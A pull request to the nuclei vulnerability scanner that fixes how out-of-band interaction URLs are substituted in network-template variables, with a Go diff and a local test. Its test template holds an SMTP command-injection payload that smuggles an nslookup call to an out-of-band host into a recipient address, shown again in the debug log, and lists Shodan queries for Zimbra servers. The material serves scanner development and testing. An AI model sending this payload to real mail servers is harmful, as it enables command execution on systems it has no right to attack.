### PR TITLE
fix: `{{interactsh-url}}` replacement in variables for network template

### DIFF
--- a/pkg/protocols/network/request.go
+++ b/pkg/protocols/network/request.go
@@ -289,30 +289,31 @@ func (request *Request) executeRequestWithPayloads(variables map[string]interfac
 	inputEvents := make(map[string]interface{})
 
 	for _, input := range request.Inputs {
-		data := []byte(input.Data)
+		dataInBytes := []byte(input.Data)
+		var err error
 
-		if request.options.Interactsh != nil {
-			var transformedData string
-			transformedData, interactshURLs = request.options.Interactsh.Replace(string(data), []string{})
-			data = []byte(transformedData)
-		}
-
-		finalData, err := expressions.EvaluateByte(data, interimValues)
+		dataInBytes, err = expressions.EvaluateByte(dataInBytes, interimValues)
 		if err != nil {
 			request.options.Output.Request(request.options.TemplatePath, address, request.Type().String(), err)
 			request.options.Progress.IncrementFailedRequestsBy(1)
 			return errors.Wrap(err, "could not evaluate template expressions")
 		}
 
-		reqBuilder.Write(finalData)
+		data := string(dataInBytes)
+		if request.options.Interactsh != nil {
+			data, interactshURLs = request.options.Interactsh.Replace(data, []string{})
+			dataInBytes = []byte(data)
+		}
 
-		if err := expressions.ContainsUnresolvedVariables(string(finalData)); err != nil {
+		reqBuilder.Write(dataInBytes)
+
+		if err := expressions.ContainsUnresolvedVariables(data); err != nil {
 			gologger.Warning().Msgf("[%s] Could not make network request for %s: %v\n", request.options.TemplateID, actualAddress, err)
 			return nil
 		}
 
 		if input.Type.GetType() == hexType {
-			finalData, err = hex.DecodeString(string(finalData))
+			dataInBytes, err = hex.DecodeString(data)
 			if err != nil {
 				request.options.Output.Request(request.options.TemplatePath, address, request.Type().String(), err)
 				request.options.Progress.IncrementFailedRequestsBy(1)
@@ -320,7 +321,7 @@ func (request *Request) executeRequestWithPayloads(variables map[string]interfac
 			}
 		}
 
-		if _, err := conn.Write(finalData); err != nil {
+		if _, err := conn.Write(dataInBytes); err != nil {
 			request.options.Output.Request(request.options.TemplatePath, address, request.Type().String(), err)
 			request.options.Progress.IncrementFailedRequestsBy(1)
 			return errors.Wrap(err, "could not write request to server")


### PR DESCRIPTION
- closes: #5669 

## Test:
<details>

<summary>local server</summary>

```bash
$ docker run -p 1080:1080 -p 1025:1025 maildev/maildev
```

</details>

<details>

<summary>Template</summary>

```yaml
id: smtp-command-injection

info:
  name: SMTP Command Injection
  author: ProjectDiscoveryAI
  severity: high
  metadata:
    max-request: 4
    vendor: zimbra
    product: collaboration
    shodan-query:
      - http.favicon.hash:"1624375939"
      - http.favicon.hash:"475145467"

variables:
  oob: "{{interactsh-url}}"

tcp:
  - inputs:
      - data: "EHLO {{Host}}\r\n"
      - data: "MAIL FROM:<attacker@localhost>\r\n"
      - data: "RCPT TO:<victim($(nslookup$IFS{{oob}}))@example.com>\r\n"
      - data: "DATA\r\n"
      - data: "Subject: Test\r\n"
      - data: "Test email body.\r\n"
      - data: ".\r\n"
      - data: "QUIT\r\n"
    host:
      - "{{Hostname}}"
    port: 1025
    read-size: 1024
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
```

</details>

```console
✗ ./nuclei -t test.yaml -u localhost -v -debug

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.3.4

                projectdiscovery.io

[VER] Started metrics server at localhost:9092
[INF] Current nuclei version: v3.3.4 (latest)
[INF] Current nuclei-templates version: v10.0.0 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 255
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] Using Interactsh Server: oast.fun
[INF] [smtp-command-injection] Dumped Network request for localhost:1025
00000000  45 48 4c 4f 20 6c 6f 63  61 6c 68 6f 73 74 0d 0a  |EHLO localhost..|
00000010  4d 41 49 4c 20 46 52 4f  4d 3a 3c 61 74 74 61 63  |MAIL FROM:<attac|
00000020  6b 65 72 40 6c 6f 63 61  6c 68 6f 73 74 3e 0d 0a  |ker@localhost>..|
00000030  52 43 50 54 20 54 4f 3a  3c 76 69 63 74 69 6d 28  |RCPT TO:<victim(|
00000040  24 28 6e 73 6c 6f 6f 6b  75 70 24 49 46 53 63 72  |$(nslookup$IFScr|
00000050  74 36 61 72 38 69 32 6a  73 6d 35 66 69 64 39 36  |t6ar8i2jsm5fid96|
00000060  61 30 70 66 73 77 78 68  38 35 6d 66 74 73 71 2e  |a0pfswxh85mftsq.|
00000070  6f 61 73 74 2e 66 75 6e  29 29 40 65 78 61 6d 70  |oast.fun))@examp|
00000080  6c 65 2e 63 6f 6d 3e 0d  0a 44 41 54 41 0d 0a 53  |le.com>..DATA..S|
00000090  75 62 6a 65 63 74 3a 20  54 65 73 74 0d 0a 54 65  |ubject: Test..Te|
000000a0  73 74 20 65 6d 61 69 6c  20 62 6f 64 79 2e 0d 0a  |st email body...|
000000b0  2e 0d 0a 51 55 49 54 0d  0a                       |...QUIT..| address=localhost:1025
[VER] Sent TCP request to localhost:1025
[DBG] [smtp-command-injection] Dumped Network response for localhost:1025

00000000  34 32 31 20 66 65 39 31  39 39 38 63 34 61 64 33  |421 fe91998c4ad3|
00000010  20 59 6f 75 20 74 61 6c  6b 20 74 6f 6f 20 73 6f  | You talk too so|
00000020  6f 6e 0d 0a                                       |on..|
[INF] No results found. Better luck next time!
```

## Checklist

<!-- Put an "x" in the boxes that apply. You can also fill these out after creating the PR. If you're unsure about any of them, don't hesitate to ask. We're here to help! This is simply a reminder of what we are going to look for before merging your code. -->

- [x] Pull request is created against the [dev](https://github.com/projectdiscovery/nuclei/tree/dev) branch
- [ ] All checks passed (lint, unit/integration/regression tests etc.) with my changes
- [ ] I have added tests that prove my fix is effective or that my feature works
- [ ] I have added necessary documentation (if appropriate)